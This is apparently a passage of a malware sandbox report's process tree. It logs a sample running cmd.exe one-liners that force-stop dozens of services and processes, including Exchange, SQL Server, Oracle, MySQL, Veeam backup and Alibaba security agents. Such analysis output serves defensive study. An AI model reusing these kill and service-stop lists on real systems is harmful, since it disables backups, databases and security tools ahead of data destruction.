        
        PID:1704
  - - C:\Windows\SysWOW64\net.exe
      net stop U8WorkerService2
      4⤵
      PID:4920
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop U8WorkerService2
        5⤵
        
        PID:4212
  - - C:\Windows\SysWOW64\net.exe
      net stop "memcached Server"
      4⤵
      PID:3196
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "memcached Server"
        5⤵
        
        PID:868
  - - C:\Windows\SysWOW64\net.exe
      net stop Apache2.4
      4⤵
      PID:1532
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Apache2.4
        5⤵
        
        PID:1092
  - - C:\Windows\SysWOW64\net.exe
      net stop UFIDAWebService
      4⤵
      PID:1960
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UFIDAWebService
        5⤵
        
        PID:1664
  - - C:\Windows\SysWOW64\net.exe
      net stop MSComplianceAudit
      4⤵
      PID:3260
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSComplianceAudit
        5⤵
        
        PID:4276
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeADTopology
      4⤵
      PID:2168
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeADTopology
        5⤵
        
        PID:1548
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeAntispamUpdate
      4⤵
      PID:3660
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeAntispamUpdate
        5⤵
        
        PID:1576
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop JWService
        5⤵
        
        PID:3392
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeCompliance
      4⤵
      PID:1628
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeCompliance
        5⤵
        
        PID:4072
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeDagMgmt
      4⤵
      PID:2376
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeDagMgmt
        5⤵
        
        PID:1480
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeDelivery
      4⤵
      PID:1584
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeDelivery
        5⤵
        
        PID:3832
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeDiagnostics
      4⤵
      PID:1932
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeDiagnostics
        5⤵
        
        PID:2432
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeEdgeSync
      4⤵
      PID:4876
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeEdgeSync
        5⤵
        
        PID:4484
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeFastSearch
      4⤵
      PID:3504
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeFastSearch
        5⤵
        
        PID:3012
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeFrontEndTransport
      4⤵
      PID:1572
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeFrontEndTransport
        5⤵
        
        PID:4492
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeHM
      4⤵
      PID:3960
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeHM
        5⤵
        
        PID:5076
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$SQL2008
      4⤵
      PID:3692
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SQL2008
        5⤵
        
        PID:4284
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeHMRecovery
      4⤵
      PID:4128
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeImap4
      4⤵
      PID:2928
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeImap4
        5⤵
        
        PID:4132
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeIMAP4BE
      4⤵
      PID:1880
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeIMAP4BE
        5⤵
        
        PID:1412
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeIS
      4⤵
      PID:4716
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeIS
        5⤵
        
        PID:744
  - - C:\Windows\SysWOW64\net.exe
      net stop MSExchangeMailboxAssistants
      4⤵
      PID:4228
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeMailboxAssistants
        5⤵
        
        PID:1124
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
    3⤵
    PID:4040
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ThunderPlatform.exe /F
      4⤵
      PID:4728
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM iexplore.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2072
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vm-agent.exe /F
      4⤵
      Kills process with taskkill
      PID:1184
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vm-agent-daemon.exe /F
      4⤵
      PID:3092
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM eSightService.exe /F
      4⤵
      PID:4220
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cygrunsrv.exe /F
      4⤵
      PID:5052
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM wrapper.exe /F
      4⤵
      PID:3044
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM nginx.exe /F
      4⤵
      PID:4468
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM node.exe /F
      4⤵
      PID:4892
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sshd.exe /F
      4⤵
      PID:1412
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vm-tray.exe /F
      4⤵
      Kills process with taskkill
      PID:744
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM iempwatchdog.exe /F
      4⤵
      PID:4284
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlwriter.exe /F
      4⤵
      PID:1704
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM php.exe /F
      4⤵
      PID:2528
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "notepad++.exe" /F
      4⤵
      PID:1364
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "phpStudy.exe" /F
      4⤵
      PID:1704
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM OPCClient.exe /F
      4⤵
      PID:4444
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM navicat.exe /F
      4⤵
      PID:2268
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SupportAssistAgent.exe /F
      4⤵
      PID:1192
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SunloginClient.exe /F
      4⤵
      PID:3820
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SOUNDMAN.exe /F
      4⤵
      PID:1548
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM WeChat.exe /F
      4⤵
      PID:2196
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TXPlatform.exe /F
      4⤵
      PID:4092
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Tencentdll.exe /F
      4⤵
      PID:4640
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM httpd.exe /F
      4⤵
      Kills process with taskkill
      PID:4468
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM jenkins.exe /F
      4⤵
      PID:3660
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM QQ.exe /F
      4⤵
      PID:1356
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
    3⤵
    PID:3108
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlservr.exe /F
      4⤵
      PID:4060
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM httpd.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4800
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM java.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4228
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fdhost.exe /F
      4⤵
      PID:4952
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM fdlauncher.exe /F
      4⤵
      PID:820
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM reportingservicesservice.exe /F
      4⤵
      PID:3988
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM softmgrlite.exe /F
      4⤵
      PID:4996
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlbrowser.exe /F
      4⤵
      PID:4804
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ssms.exe /F
      4⤵
      PID:4036
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vmtoolsd.exe /F
      4⤵
      PID:4260
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM baidunetdisk.exe /F
      4⤵
      PID:2972
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM yundetectservice.exe /F
      4⤵
      PID:2900
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ssclient.exe /F
      4⤵
      PID:368
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNAupdaemon.exe /F
      4⤵
      PID:4036
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RAVCp164.exe /F
      4⤵
      PID:1660
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM igfxEM.exe /F
      4⤵
      PID:4312
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM igfxHK.exe /F
      4⤵
      PID:4228
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM igfxTray.exe /F
      4⤵
      PID:1660
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM 360bdoctor.exe /F
      4⤵
      PID:1248
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM GNCEFExternal.exe /F
      4⤵
      PID:1584
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM PrivacyIconClient.exe /F
      4⤵
      PID:2320
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UIODetect.exe /F
      4⤵
      PID:3320
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM AutoDealService.exe /F
      4⤵
      PID:4036
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM IDDAService.exe /F
      4⤵
      PID:2384
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM EnergyDataService.exe /F
      4⤵
      PID:3160
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM MPService.exe /F
      4⤵
      PID:2252
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TransMain.exe /F
      4⤵
      PID:3216
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""
    3⤵
    PID:2308
  - - C:\Windows\SysWOW64\net.exe
      net stop UIODetect
      4⤵
      PID:2932
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UIODetect
        5⤵
        
        PID:372
  - - C:\Windows\SysWOW64\net.exe
      net stop VMwareHostd
      4⤵
      PID:4908
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMwareHostd
        5⤵
        
        PID:1716
  - - C:\Windows\SysWOW64\net.exe
      net stop TeamViewer8
      4⤵
      Discovers systems in the same network
      PID:3100
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TeamViewer8
        5⤵
        
        PID:2100
  - - C:\Windows\SysWOW64\net.exe
      net stop VMUSBArbService
      4⤵
      PID:4972
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMUSBArbService
        5⤵
        
        PID:768
  - - C:\Windows\SysWOW64\net.exe
      net stop VMAuthdService
      4⤵
      PID:2972
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMAuthdService
        5⤵
        
        PID:372
  - - C:\Windows\SysWOW64\net.exe
      net stop wanxiao-monitor
      4⤵
      PID:3852
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop wanxiao-monitor
        5⤵
        
        PID:540
  - - C:\Windows\SysWOW64\net.exe
      net stop WebAttendServer
      4⤵
      PID:1528
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop WebAttendServer
        5⤵
        
        PID:5048
  - - C:\Windows\SysWOW64\net.exe
      net stop mysqltransport
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2572
  - - C:\Windows\SysWOW64\net.exe
      net stop VMnetDHCP
      4⤵
      PID:4456
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VMnetDHCP
        5⤵
        
        PID:4676
  - - C:\Windows\SysWOW64\net.exe
      net stop "VMware NAT Service"
      4⤵
      PID:4160
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "VMware NAT Service"
        5⤵
        
        PID:2056
  - - C:\Windows\SysWOW64\net.exe
      net stop Tomcat8
      4⤵
      PID:3216
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Tomcat8
        5⤵
        
        PID:4804
  - - C:\Windows\SysWOW64\net.exe
      net stop TeamViewer
      4⤵
      Discovers systems in the same network
      PID:2168
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TeamViewer
        5⤵
        
        PID:768
  - - C:\Windows\SysWOW64\net.exe
      net stop QPCore
      4⤵
      PID:4496
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop QPCore
        5⤵
        
        PID:4464
  - - C:\Windows\SysWOW64\net.exe
      net stop CASLicenceServer
      4⤵
      PID:4212
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASLicenceServer
        5⤵
        
        PID:776
  - - C:\Windows\SysWOW64\net.exe
      net stop CASWebServer
      4⤵
      PID:3592
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASWebServer
        5⤵
        
        PID:4048
  - - C:\Windows\SysWOW64\net.exe
      net stop AutoUpdateService
      4⤵
      PID:4208
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AutoUpdateService
        5⤵
        
        PID:1008
  - - C:\Windows\SysWOW64\net.exe
      net stop "Alibaba Security Aegis Detect Service"
      4⤵
      PID:1328
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"
        5⤵
        
        PID:3712
  - - C:\Windows\SysWOW64\net.exe
      net stop "Alibaba Security Aegis Update Service"
      4⤵
      PID:3392
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"
        5⤵
        
        PID:4260
  - - C:\Windows\SysWOW64\net.exe
      net stop "AliyunService"
      4⤵
      PID:3092
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "AliyunService"
        5⤵
        
        PID:1836
  - - C:\Windows\SysWOW64\net.exe
      net stop CASXMLService
      4⤵
      PID:368
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop CASXMLService
        5⤵
        
        PID:5076
  - - C:\Windows\SysWOW64\net.exe
      net stop AGSService
      4⤵
      PID:3592
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AGSService
        5⤵
        
        PID:4480
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"
    3⤵
    PID:3740
  - - C:\Windows\SysWOW64\net.exe
      net stop HaoZipSvc
      4⤵
      PID:4832
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop HaoZipSvc
        5⤵
        
        PID:2528
  - - C:\Windows\SysWOW64\net.exe
      net stop "igfxCUIService2.0.0.0"
      4⤵
      PID:4496
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"
        5⤵
        
        PID:4716
  - - C:\Windows\SysWOW64\net.exe
      net stop Realtek11nSU
      4⤵
      PID:648
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Realtek11nSU
        5⤵
        
        PID:3120
  - - C:\Windows\SysWOW64\net.exe
      net stop xenlite
      4⤵
      PID:2132
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop xenlite
        5⤵
        
        PID:3752
  - - C:\Windows\SysWOW64\net.exe
      net stop XenSvc
      4⤵
      PID:4220
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop XenSvc
        5⤵
        
        PID:4712
  - - C:\Windows\SysWOW64\net.exe
      net stop Apache2.2
      4⤵
      PID:3572
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Apache2.2
        5⤵
        
        PID:368
  - - C:\Windows\SysWOW64\net.exe
      net stop "Synology Drive VSS Service x64"
      4⤵
      PID:1136
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Synology Drive VSS Service x64"
        5⤵
        
        PID:3272
  - - C:\Windows\SysWOW64\net.exe
      net stop DellDRLogSvc
      4⤵
      PID:4360
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DellDRLogSvc
        5⤵
        
        PID:2356
  - - C:\Windows\SysWOW64\net.exe
      net stop FirebirdGuardianDeafaultInstance
      4⤵
      PID:2052
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance
        5⤵
        
        PID:3068
  - - C:\Windows\SysWOW64\net.exe
